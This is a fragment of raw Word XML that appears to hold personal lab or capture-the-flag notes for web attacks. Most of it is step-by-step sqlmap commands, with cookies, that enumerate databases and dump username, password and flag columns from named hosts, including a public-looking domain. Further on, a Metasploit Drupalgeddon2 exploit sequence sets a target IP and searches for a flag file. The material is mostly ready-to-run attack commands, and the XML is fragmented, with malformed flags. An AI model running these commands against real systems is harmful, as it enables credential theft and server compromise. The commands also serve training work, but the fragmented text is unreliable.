          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>session_id</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="7F8F021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" -D </w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="7F8F021F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>database_name</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="7F8F021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--tables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7F8F021F" w:rsidP="7D333612" w:rsidRDefault="7F8F021F" w14:paraId="7C58A34D" w14:textId="49FDB226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D333612" w:rsidR="7F8F021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-&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="7F8F021F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="7F8F021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-u "</w:t>
      </w:r>
      <w:hyperlink r:id="R5fd882039b7543b1">
        <w:r w:rsidRPr="7D333612" w:rsidR="51F02A7C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http://test1.ceg.com/search.php?q=test</w:t>
        </w:r>
        <w:r w:rsidRPr="7D333612" w:rsidR="7F8F021F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"</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="7D333612" w:rsidR="7F8F021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--cookie="PHPSESSID=your_ </w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="7F8F021F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>session_id</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="7F8F021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" -D </w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="7F8F021F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>database_name</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="7F8F021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-T users –columns</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7F8F021F" w:rsidP="7D333612" w:rsidRDefault="7F8F021F" w14:paraId="147CE5CA" w14:textId="1305D682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D333612" w:rsidR="7F8F021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-&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="7F8F021F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="7F8F021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-u "</w:t>
      </w:r>
      <w:hyperlink r:id="R8c4cad61b83f4a4b">
        <w:r w:rsidRPr="7D333612" w:rsidR="51F02A7C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http://test1.ceg.com/search.php?q=test</w:t>
        </w:r>
        <w:r w:rsidRPr="7D333612" w:rsidR="7F8F021F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"</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="7D333612" w:rsidR="7F8F021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--cookie="PHPSESSID=your_ </w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="7F8F021F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>session_id</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="7F8F021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" -D </w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="7F8F021F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>database_name</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="7F8F021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-T users -C </w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="7F8F021F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>username,password</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="7F8F021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--dump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6CFD8F50" w:rsidP="7D333612" w:rsidRDefault="6CFD8F50" w14:paraId="595291C3" w14:textId="296DF6C6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D333612" w:rsidR="6CFD8F50">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6CFD8F50" w:rsidP="7D333612" w:rsidRDefault="6CFD8F50" w14:paraId="3DAD77FD" w14:textId="6D97445E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D333612" w:rsidR="6CFD8F5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-&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="6CFD8F50">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="6CFD8F5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-u "http://192.168.44.40" --crawl=3 --level=5 --risk=3 –dbs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6CFD8F50" w:rsidP="7D333612" w:rsidRDefault="6CFD8F50" w14:paraId="3D53A3FE" w14:textId="0C722D07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D333612" w:rsidR="6CFD8F50">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="6CFD8F5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sqlmap -u "</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="6CFD8F50">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://192.168.44.40</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="6CFD8F50">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>" --crawl=3 --level=5 --risk=3 -D database_name -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6CFD8F50" w:rsidP="7D333612" w:rsidRDefault="6CFD8F50" w14:paraId="00AA5BA3" w14:textId="742102AB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="7D333612" w:rsidR="6CFD8F50">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-tables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6CFD8F50" w:rsidP="7D333612" w:rsidRDefault="6CFD8F50" w14:paraId="075FA3AA" w14:textId="78C3423B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D333612" w:rsidR="6CFD8F5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-&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="6CFD8F50">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="6CFD8F5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-u "</w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="7D333612" w:rsidR="6CFD8F50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http://192.168.44.40"</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="7D333612" w:rsidR="6CFD8F5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--crawl=3 --level=5 --risk=3 -D </w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="6CFD8F50">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>database_name</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="6CFD8F5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T </w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="6CFD8F50">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="6CFD8F5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–columns</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6CFD8F50" w:rsidP="7D333612" w:rsidRDefault="6CFD8F50" w14:paraId="5D16FB31" w14:textId="207A8D8C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D333612" w:rsidR="6CFD8F50">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-&gt; sqlmap -u "</w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="7D333612" w:rsidR="6CFD8F50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http://192.168.44.40"</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="7D333612" w:rsidR="6CFD8F5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--crawl=3 --level=5 --risk=3 -D database_name - T table_name -C Flag --dump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7D333612" w:rsidP="7D333612" w:rsidRDefault="7D333612" w14:paraId="07714061" w14:textId="6460680F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D333612" w:rsidP="7D333612" w:rsidRDefault="7D333612" w14:paraId="364250ED" w14:textId="6485CA5C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D333612" w:rsidP="7D333612" w:rsidRDefault="7D333612" w14:paraId="2EF4CC2B" w14:textId="618F7C4E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="7D333612" w:rsidP="7D333612" w:rsidRDefault="7D333612" w14:paraId="24171309" w14:textId="136C5589">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="1EBB04BD" w:rsidP="7D333612" w:rsidRDefault="1EBB04BD" w14:paraId="22655060" w14:textId="11F2EC74">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="1EBB04BD">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBB04BD" w:rsidP="7D333612" w:rsidRDefault="1EBB04BD" w14:paraId="237ED4DE" w14:textId="18E032DB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D333612" w:rsidR="1EBB04BD">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>now in parrot os, open firefox and login into the website given and details.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBB04BD" w:rsidP="7D333612" w:rsidRDefault="1EBB04BD" w14:paraId="38E3A28D" w14:textId="61A6BFDF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D333612" w:rsidR="1EBB04BD">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Go to profile and and right cleck and inspect and console type “document.cookie” you will get one value.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBB04BD" w:rsidP="7D333612" w:rsidRDefault="1EBB04BD" w14:paraId="6FEA41B1" w14:textId="1FE3BA58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D333612" w:rsidR="1EBB04BD">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Open the terminal and type the below commands to get the password of other user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBB04BD" w:rsidP="7D333612" w:rsidRDefault="1EBB04BD" w14:paraId="650AB6EE" w14:textId="303A441F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D333612" w:rsidR="1EBB04BD">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="1EBB04B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-u "</w:t>
      </w:r>
      <w:hyperlink r:id="R364b54b34adc42e5">
        <w:r w:rsidRPr="7D333612" w:rsidR="2EFD8F9A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http://www.justwatch.com/viewprofile.aspx?id=1</w:t>
        </w:r>
        <w:r w:rsidRPr="7D333612" w:rsidR="1EBB04BD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"</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="7D333612" w:rsidR="1EBB04B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--cookie="</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="1EBB04BD">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mscope</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="1EBB04BD">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=1jwuydl=;" –-</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="1EBB04BD">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dbs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBB04BD" w:rsidP="7D333612" w:rsidRDefault="1EBB04BD" w14:paraId="18D556AF" w14:textId="4E689C3B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D333612" w:rsidR="1EBB04BD">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="1EBB04B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-u "</w:t>
      </w:r>
      <w:hyperlink r:id="R52430ccb193b492e">
        <w:r w:rsidRPr="7D333612" w:rsidR="2EFD8F9A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http://www.justwatch.com/viewprofile.aspx?id=1</w:t>
        </w:r>
        <w:r w:rsidRPr="7D333612" w:rsidR="1EBB04BD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"</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="7D333612" w:rsidR="1EBB04B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--cookie="</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="1EBB04BD">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mscope</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="1EBB04B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=1jwuydl=; ui-tabs-1=0" -D </w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="1EBB04BD">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>moveiscope</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="1EBB04B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-tables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBB04BD" w:rsidP="7D333612" w:rsidRDefault="1EBB04BD" w14:paraId="61934DDD" w14:textId="542EE355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D333612" w:rsidR="1EBB04BD">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="1EBB04B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-u "</w:t>
      </w:r>
      <w:hyperlink r:id="Rf5ae457dd917472d">
        <w:r w:rsidRPr="7D333612" w:rsidR="2EFD8F9A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http://www.justwatch.com/viewprofile.aspx?id=1</w:t>
        </w:r>
        <w:r w:rsidRPr="7D333612" w:rsidR="1EBB04BD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"</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="7D333612" w:rsidR="1EBB04B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--cookie="</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="1EBB04BD">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mscope</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="1EBB04B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=1jwuydl=; ui-tabs-1=0" -D </w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="1EBB04BD">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>moviescope</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="1EBB04B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-T </w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="1EBB04BD">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="1EBB04BD">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-Login – -dump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7D333612" w:rsidP="7D333612" w:rsidRDefault="7D333612" w14:paraId="4CCBBF5B" w14:textId="723B5BBB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="7D333612" w:rsidP="7D333612" w:rsidRDefault="7D333612" w14:paraId="75305EA2" w14:textId="2433EF5D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0928D459" w:rsidP="7D333612" w:rsidRDefault="0928D459" w14:paraId="22266B9C" w14:textId="0D2F51C0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7D333612" w:rsidR="0928D459">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Website:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0928D459" w:rsidP="7D333612" w:rsidRDefault="0928D459" w14:paraId="53B47343" w14:textId="26BDA841">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="0928D459">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>---Drupal---</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0928D459" w:rsidP="7D333612" w:rsidRDefault="0928D459" w14:paraId="3641F92B" w14:textId="0E943C47">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="0928D459">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; </w:t>
      </w:r>
      <w:r w:rsidR="0928D459">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>nikto</w:t>
      </w:r>
      <w:r w:rsidR="0928D459">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> –h ....</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0928D459" w:rsidP="7D333612" w:rsidRDefault="0928D459" w14:paraId="41C91243" w14:textId="142C96A5">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="0928D459">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-&gt;msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0928D459" w:rsidP="7D333612" w:rsidRDefault="0928D459" w14:paraId="24823986" w14:textId="411B41B3">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="0928D459">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-&gt; search drupalgeddon2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0928D459" w:rsidP="7D333612" w:rsidRDefault="0928D459" w14:paraId="030601ED" w14:textId="47D41C4A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="0928D459">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-&gt; use exploit/</w:t>
      </w:r>
      <w:r w:rsidR="0928D459">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:r w:rsidR="0928D459">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>/webapp/drupal_drupalgeddon2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0928D459" w:rsidP="7D333612" w:rsidRDefault="0928D459" w14:paraId="2FD9DAE7" w14:textId="1F0D95EC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="0928D459">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidR="0928D459">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> set RHOST 10.10.55.50</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0928D459" w:rsidP="7D333612" w:rsidRDefault="0928D459" w14:paraId="39155E52" w14:textId="01064DC2">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="0928D459">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-&gt; set RPORT 80 # Ensure the port is correct for HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0928D459" w:rsidP="7D333612" w:rsidRDefault="0928D459" w14:paraId="7297D401" w14:textId="0CF368DF">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="0928D459">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-&gt;run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0928D459" w:rsidP="7D333612" w:rsidRDefault="0928D459" w14:paraId="45FF7D65" w14:textId="632CEC03">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="0928D459">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-&gt; find / -name Flag.txt 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7D333612" w:rsidP="7D333612" w:rsidRDefault="7D333612" w14:paraId="03D3F7CE" w14:textId="07B06D9D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="7D333612" w:rsidP="7D333612" w:rsidRDefault="7D333612" w14:paraId="7C37F3F8" w14:textId="1E7E1A03">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="38C7C267" w:rsidP="40100644" w:rsidRDefault="38C7C267" w14:paraId="715B7394" w14:textId="043B277B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
